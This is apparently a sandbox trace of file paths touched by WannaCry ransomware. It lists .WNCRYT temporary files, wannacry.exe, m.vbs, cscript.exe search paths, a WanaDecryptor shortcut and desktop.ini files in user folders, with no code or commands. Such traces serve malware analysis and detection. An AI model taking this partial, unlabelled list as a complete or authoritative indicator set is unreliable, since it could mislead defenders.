C:\Users\user\AppData\Local\Temp\428.WNCRYT
C:\Users\user\AppData\Local\Temp\429.WNCRYT
C:\Users\user\AppData\Local\Temp\430.WNCRYT
C:\Users\user\AppData\Local\Temp\431.WNCRYT
C:\Users\user\AppData\Local\Temp\432.WNCRYT
C:\Users\user\AppData\Local\Temp\433.WNCRYT
C:\Users\user\AppData\Local\Temp\434.WNCRYT
C:\Users\user\AppData\Local\Temp\435.WNCRYT
C:\Users\user\AppData\Local\Temp\436.WNCRYT
C:\Users\user\AppData\Local\Temp\437.WNCRYT
C:\Users\user\AppData\Local\Temp\438.WNCRYT
C:\Users\user\AppData\Local\Temp\439.WNCRYT
C:\Users\user\AppData\Local\Temp\440.WNCRYT
C:\Users\user\AppData\Local\Temp\441.WNCRYT
C:\Users\user\AppData\Local\Temp\442.WNCRYT
C:\Users\user\AppData\Local\Temp\443.WNCRYT
C:\Users\user\AppData\Local\Temp\444.WNCRYT
C:\Users\user\AppData\Local\Temp\445.WNCRYT
C:\Users\user\AppData\Local\Temp\446.WNCRYT
C:\Users\user\AppData\Local\Temp\447.WNCRYT
C:\Users\user\AppData\Local\Temp\448.WNCRYT
C:\Users\user\AppData\Local\Temp\449.WNCRYT
C:\Users\user\AppData\Local\Temp\450.WNCRYT
C:\Users\user\AppData\Local\Temp\451.WNCRYT
C:\Users\user\AppData\Local\Temp\452.WNCRYT
C:\Users\user\AppData\Local\Temp\453.WNCRYT
C:\Users\user\AppData\Local\Temp\454.WNCRYT
C:\Users\user\AppData\Local\Temp\455.WNCRYT
C:\Users\user\AppData\Local\Temp\456.WNCRYT
C:\Users\user\AppData\Local\Temp\457.WNCRYT
C:\Users\user\AppData\Local\Temp\458.WNCRYT
C:\Users\user\AppData\Local\Temp\459.WNCRYT
C:\Users\user\AppData\Local\Temp\460.WNCRYT
C:\Users\user\AppData\Local\Temp\461.WNCRYT
C:\Users\user\AppData\Local\Temp\462.WNCRYT
C:\Users\user\AppData\Local\Temp\463.WNCRYT
C:\Users\user\AppData\Local\Temp\464.WNCRYT
C:\Users\user\AppData\Local\Temp\465.WNCRYT
C:\Users\user\AppData\Local\Temp\466.WNCRYT
C:\Users\user\AppData\Local\Temp\467.WNCRYT
C:\Users\user\AppData\Local\Temp\468.WNCRYT
C:\Users\user\AppData\Local\Temp\469.WNCRYT
C:\Users\user\AppData\Local\Temp\470.WNCRYT
C:\Users\user\AppData\Local\Temp\471.WNCRYT
C:\Users\user\AppData\Local\Temp\472.WNCRYT
C:\Users\user\AppData\Local\Temp\473.WNCRYT
C:\Users\user\AppData\Local\Temp\474.WNCRYT
C:\Users\user\AppData\Local\Temp\475.WNCRYT
C:\Users\user\AppData\Local\Temp\476.WNCRYT
C:\Users\user\AppData\Local\Temp\477.WNCRYT
C:\Users\user\AppData\Local\Temp\478.WNCRYT
C:\Users\user\AppData\Local\Temp\479.WNCRYT
C:\Users\user\AppData\Local\Temp\480.WNCRYT
C:\Users\user\AppData\Local\Temp\481.WNCRYT
C:\Users\user\AppData\Local\Temp\482.WNCRYT
C:\Users\user\AppData\Local\Temp\483.WNCRYT
C:\Users\user\AppData\Local\Temp\484.WNCRYT
C:\Users\user\AppData\Local\Temp\485.WNCRYT
C:\Users\user\AppData\Local\Temp\486.WNCRYT
C:\Users\user\AppData\Local\Temp\487.WNCRYT
C:\Users\user\AppData\Local\Temp\488.WNCRYT
C:\Users\user\AppData\Local\Temp\489.WNCRYT
C:\Users\user\AppData\Local\Temp\490.WNCRYT
C:\Users\user\AppData\Local\Temp\491.WNCRYT
C:\Users\user\AppData\Local\Temp\492.WNCRYT
C:\Users\user\AppData\Local\Temp\493.WNCRYT
C:\Users\user\AppData\Local\Temp\494.WNCRYT
C:\Users\user\AppData\Local\Temp\495.WNCRYT
C:\Users\user\AppData\Local\Temp\496.WNCRYT
C:\Users\user\AppData\Local\Temp\497.WNCRYT
C:\Users\user\AppData\Local\Temp\498.WNCRYT
C:\Users\user\AppData\Local\Temp\499.WNCRYT
C:\Users\user\AppData\Local\Temp\500.WNCRYT
C:\Users\user\AppData\Local\Temp\501.WNCRYT
C:\Users\user\AppData\Local\Temp\502.WNCRYT
C:\Users\user\AppData\Local\Temp\503.WNCRYT
C:\Users\user\AppData\Local\Temp\504.WNCRYT
C:\Users\user\AppData\Local\Temp\505.WNCRYT
C:\Users\user\AppData\Local\Temp\506.WNCRYT
C:\Users\user\AppData\Local\Temp\507.WNCRYT
C:\Users\user\AppData\Local\Temp\508.WNCRYT
C:\Users\user\AppData\Local\Temp\509.WNCRYT
C:\Users\user\AppData\Local\Temp\510.WNCRYT
C:\Users\user\AppData\Local\Temp\511.WNCRYT
C:\Users\user\AppData\Local\Temp\512.WNCRYT
C:\Users\user\AppData\Local\Temp\513.WNCRYT
C:\Users\user\AppData\Local\Temp\514.WNCRYT
C:\Users\user\AppData\Local\Temp\515.WNCRYT
C:\Users\user\AppData\Local\Temp\516.WNCRYT
C:\Users\user\AppData\Local\Temp\517.WNCRYT
C:\Users\user\AppData\Local\Temp\518.WNCRYT
C:\Users\user\AppData\Local\Temp\519.WNCRYT
C:\Users\user\AppData\Local\Temp\520.WNCRYT
C:\Users\user\AppData\Local\Temp\521.WNCRYT
C:\Users\user\AppData\Local\Temp\522.WNCRYT
C:\Users\user\AppData\Local\Temp\523.WNCRYT
C:\Users\user\AppData\Local\Temp\524.WNCRYT
C:\Users\user\AppData\Local\Temp\525.WNCRYT
C:\Users\user\AppData\Local\Temp\526.WNCRYT
C:\Users\user\AppData\Local\Temp\527.WNCRYT
C:\Users\user\AppData\Local\Temp\528.WNCRYT
C:\Users\user\AppData\Local\Temp\529.WNCRYT
C:\Users\user\AppData\Local\Temp\530.WNCRYT
C:\Users\user\AppData\Local\Temp\531.WNCRYT
C:\Users\user\AppData\Local\Temp\532.WNCRYT
C:\Users\user\AppData\Local\Temp\533.WNCRYT
C:\Users\user\AppData\Local\Temp\534.WNCRYT
C:\Users\user\AppData\Local\Temp\535.WNCRYT
C:\Users\user\AppData\Local\Temp\536.WNCRYT
C:\Users\user\AppData\Local\Temp\537.WNCRYT
C:\Users\user\AppData\Local\Temp\538.WNCRYT
C:\Users\user\AppData\Local\Temp\539.WNCRYT
C:\Users\user\AppData\Local\Temp\540.WNCRYT
C:\Users\user\AppData\Local\Temp\541.WNCRYT
C:\Users\user\AppData\Local\Temp\542.WNCRYT
C:\Users\user\AppData\Local\Temp\543.WNCRYT
C:\Users\user\AppData\Local\Temp\544.WNCRYT
C:\Users\user\AppData\Local\
C:\Users\user\AppData\Local\Temp\.ses
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973
C:\Users\user\AppData\Local\Temp\acrord32_sbx
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\SearchEmbdIndex
C:\Users\user\AppData\Local\Temp\cab
C:\Users\user\AppData\Local\Temp\cab\Windows6.1-KB3125574-v4-x64-pkgProperties.txt
C:\Users\user\AppData\Local\Temp\cab\Windows6.1-KB3125574-v4-x64.xml
C:\Users\user\AppData\Local\Temp\cabFB33.tmp
C:\Users\user\AppData\Local\Temp\Deployment
C:\Users\user\AppData\Local\Temp\Deployment\MK9E76ER.PET
C:\Users\user\AppData\Local\Temp\DMI35E4.tmp
C:\Users\user\AppData\Local\Temp\DMI6011.tmp
C:\Users\user\AppData\Local\Temp\FXSAPIDebugLogFile.txt
C:\Users\user\AppData\Local\Temp\hsperfdata_user
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
C:\Users\user\AppData\Local\Temp\jusched.log
C:\Users\user\AppData\Local\Temp\Low
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.13_(x64)_20221116102602.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.13_(x64)_20221116102602_000_dotnet_hostfxr_5.0.13_win_x64.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.13_(x64)_20221116102602_001_dotnet_runtime_5.0.13_win_x64.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.13_(x86)_20221116102541.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.13_(x86)_20221116102541_000_dotnet_hostfxr_5.0.13_win_x86.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.13_(x86)_20221116102541_001_dotnet_runtime_5.0.13_win_x86.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.17_(x64)_20221116102547.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.17_(x64)_20221116102547_000_dotnet_runtime_5.0.17_win_x64.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.17_(x64)_20221116102547_001_dotnet_hostfxr_5.0.17_win_x64.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.17_(x64)_20221116102547_002_dotnet_host_5.0.17_win_x64.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.17_(x86)_20221116102534.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.17_(x86)_20221116102534_000_dotnet_runtime_5.0.17_win_x86.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.17_(x86)_20221116102534_001_dotnet_hostfxr_5.0.17_win_x86.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_5.0.17_(x86)_20221116102534_002_dotnet_host_5.0.17_win_x86.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.11_(x64)_20221116102624.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.11_(x64)_20221116102624_000_dotnet_runtime_6.0.11_win_x64.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.11_(x64)_20221116102624_001_dotnet_hostfxr_6.0.11_win_x64.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.11_(x64)_20221116102624_002_dotnet_host_6.0.11_win_x64.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.11_(x86)_20221116102611.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.11_(x86)_20221116102611_000_dotnet_runtime_6.0.11_win_x86.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.11_(x86)_20221116102611_001_dotnet_hostfxr_6.0.11_win_x86.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.11_(x86)_20221116102611_002_dotnet_host_6.0.11_win_x86.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.1_(x64)_20221116102629.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.1_(x64)_20221116102629_000_dotnet_hostfxr_6.0.1_win_x64.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.1_(x64)_20221116102629_001_dotnet_runtime_6.0.1_win_x64.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.1_(x86)_20221116102618.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.1_(x86)_20221116102618_000_dotnet_hostfxr_6.0.1_win_x86.msi.log
C:\Users\user\AppData\Local\Temp\Microsoft_.NET_Runtime_-_6.0.1_(x86)_20221116102618_001_dotnet_runtime_6.0.1_win_x86.msi.log
C:\Users\user\AppData\Local\Temp\msedge_installer.log
C:\Users\user\AppData\Local\Temp\officebackgroundtaskhandler.exe_c2rdll(20240805222401EA8).log
C:\Users\user\AppData\Local\Temp\officeclicktorun.exe_c2ruidll(202212070900479EC).log
C:\Users\user\AppData\Local\Temp\officeclicktorun.exe_c2ruidll(20221207091735A24).log
C:\Users\user\AppData\Local\Temp\officeclicktorun.exe_c2ruidll(2023020811460291C).log
C:\Users\user\AppData\Local\Temp\officeclicktorun.exe_c2ruidll(202302081424005D8).log
C:\Users\user\AppData\Local\Temp\officeclicktorun.exe_c2ruidll(20230208160310A50).log
C:\Users\user\AppData\Local\Temp\officeclicktorun.exe_c2ruidll(202408052158191098).log
C:\Users\user\AppData\Local\Temp\officeclicktorun.exe_c2ruidll(2024080522051013CC).log
C:\Users\user\AppData\Local\Temp\rollup.msu
C:\Users\user\AppData\Local\Temp\SaraSetup.log
C:\Users\user\AppData\Local\Temp\sdelete.exe
C:\Users\user\AppData\Local\Temp\tmpCEF2.tmp
C:\Users\user\AppData\Local\Temp\tmpD049.tmp
C:\Users\user\AppData\Local\Temp\tmpD0B6.tmp
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20221116-1317.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20221207-0900.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20221207-0917.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20230208-1146.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20230208-1424.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20230208-1603.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20240805-2158.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20240805-2205.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20240805-2211.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20240805-2213.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20240805-2222.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20240805-2222a.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20240805-2223.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20251205-0710.log
C:\Users\user\AppData\Local\Temp\USERDUM-8A61A1P-20251205-0713.log
C:\Users\user\AppData\Local\Temp\wannacry.exe
C:\Users\user\AppData\Local\Temp\wannacry.zip
C:\Users\user\AppData\Local\Temp\WPDNSE
C:\Users\user\AppData\Local\Temp\WPF
C:\Users\user\AppData\Local\Temp\{9D6A3159-D7F9-4CE3-837B-4361391EF94A} - OProcSessId.dat
C:\Users\user\AppData\Local\Temp\*
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\CbsProvider.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\CompatProvider.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\DismCore.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\DismCorePS.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\DismHost.exe
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\DismProv.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\DmiProvider.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\CbsProvider.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\CompatProvider.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\DismCore.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\DismProv.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\DmiProvider.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\FolderProvider.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\IntlProvider.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\LogProvider.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\MsiProvider.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\OSProvider.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\SmiProvider.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\TransmogProvider.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\UnattendProvider.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\WimProvider.dll.mui
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\FolderProvider.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\IntlProvider.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\LogProvider.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\MsiProvider.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\OSProvider.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\SmiProvider.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\TransmogProvider.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\UnattendProvider.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\wdscore.dll
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\WimProvider.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\CbsProvider.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\CompatProvider.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\DismCore.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\DismCorePS.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\DismHost.exe
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\DismProv.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\DmiProvider.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\CbsProvider.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\CompatProvider.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\DismCore.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\DismProv.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\DmiProvider.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\FolderProvider.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\IntlProvider.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\LogProvider.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\MsiProvider.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\OSProvider.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\SmiProvider.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\TransmogProvider.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\UnattendProvider.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\WimProvider.dll.mui
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\FolderProvider.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\IntlProvider.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\LogProvider.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\MsiProvider.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\OSProvider.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\SmiProvider.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\TransmogProvider.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\UnattendProvider.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\wdscore.dll
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\WimProvider.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\CbsProvider.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\CompatProvider.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\DismCore.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\DismCorePS.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\DismHost.exe
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\DismProv.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\DmiProvider.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\CbsProvider.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\CompatProvider.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\DismCore.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\DismProv.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\DmiProvider.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\FolderProvider.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\IntlProvider.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\LogProvider.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\MsiProvider.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\OSProvider.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\SmiProvider.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\TransmogProvider.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\UnattendProvider.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\WimProvider.dll.mui
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\FolderProvider.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\IntlProvider.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\LogProvider.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\MsiProvider.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\OSProvider.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\SmiProvider.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\TransmogProvider.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\UnattendProvider.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\wdscore.dll
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\WimProvider.dll
C:\Users\user\AppData\Local\Temp\hsperfdata_user\2768
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\*
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\*
C:\Users\user\AppData\Local\Temp\1232647F-218C-4BC8-A82B-E4944071DF69\en-US\
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\*
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\*
C:\Users\user\AppData\Local\Temp\5A566B61-1305-4EAF-BD37-451F8033AA09\en-US\
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\*
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\*
C:\Users\user\AppData\Local\Temp\94EFBF3E-8A07-4B91-9D5E-36014747D973\en-US\
C:\Users\user\AppData\Local\Temp\acrord32_sbx\*
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\*
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\*
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\*
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\*
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\
C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\Acrobat\DC\SearchEmbdIndex\*
C:\Users\user\AppData\Local\Temp\cab\*
C:\Users\user\AppData\Local\Temp\cab\
C:\Users\user\AppData\Local\Temp\Deployment\*
C:\Users\user\AppData\Local\Temp\Deployment\
C:\Users\user\AppData\Local\Temp\Deployment\MK9E76ER.PET\*
C:\Users\user\AppData\Local\Temp\hsperfdata_user\*
C:\Users\user\AppData\Local\Temp\hsperfdata_user\
C:\Users\user\AppData\Local\Temp\Low\*
C:\Users\user\AppData\Local\Temp\msg\*
C:\Users\user\AppData\Local\Temp\WPDNSE\*
C:\Users\user\AppData\Local\Temp\WPF\*
C:\Users\user\AppData\Local\Temp\*.WNCRYT
C:\Users\user\AppData\Local\Temp\m.vbs
C:\Users\user\AppData\Local\Temp\cscript.exe
C:\Users\user\AppData\Local\Temp\cscript.exe.*
C:\Python38\Scripts\cscript.exe
C:\Python38\Scripts\cscript.exe.*
C:\Python38\cscript.exe
C:\Python38\cscript.exe.*
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cscript.exe
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\cscript.exe.*
C:\ProgramData\Boxstarter\cscript.exe
C:\ProgramData\Boxstarter\cscript.exe.*
C:\Windows\System32\cscript.exe
C:\Windows\Globalization\Sorting\sortdefault.nls
\Device\KsecDD
C:\Windows\SysWOW64\cscript.exe
C:\Windows\SysWOW64\wshom.ocx
C:\Windows\SysWOW64\shell32.dll
C:\Users\user\AppData\Local\Temp\@WanaDecryptor@.exe.lnk\desktop.ini
C:\Users\desktop.ini
C:\Users\user\Desktop\desktop.ini
C:\Users\user\Searches\desktop.ini
\??\MountPointManager
C:\Users\user\Videos\desktop.ini
C:\Users\user\Pictures\desktop.ini
C:\Users\user\Contacts\desktop.ini
C:\Users\user\Favorites\desktop.ini
C:\Users\user\Music\desktop.ini
C:\Users\user\Downloads\desktop.ini
C:\Users\user\Documents\desktop.ini
